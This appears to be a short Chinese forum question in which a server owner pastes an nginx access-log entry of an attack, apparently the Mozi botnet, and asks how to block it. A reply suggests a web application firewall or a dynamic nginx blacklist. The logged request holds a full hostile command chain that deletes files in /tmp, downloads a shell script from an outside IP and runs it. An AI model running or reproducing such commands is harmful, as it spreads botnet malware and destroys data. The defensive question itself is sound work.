nginx 的 access.log 出现一条日志
127.0.0.1:80|93.107.49.220|-|[25/Oct/2022:07:53:02 +0800]|GET /shell?cd+/tmp;rm+-rf+*;wget+109.206.241.129/666.sh;sh+/tmp/666.sh HTTP/1.1|0.000|500|186|-|Hello, world|-
- http_host:127.0.0.1:80
- remote_addr:93.107.49.220
- user-agent:Hello, world
- request:
GET /shell?cd+/tmp;rm+-rf+*;wget+109.206.241.129/666.sh;sh+/tmp/666.sh HTTP/1.1
查阅资料好像是 mozi 攻击,请问这种攻击应该怎么避免?
上waf,比如https://www.goodwaf.cn/ 或者已经用nginx弄个动态的黑名单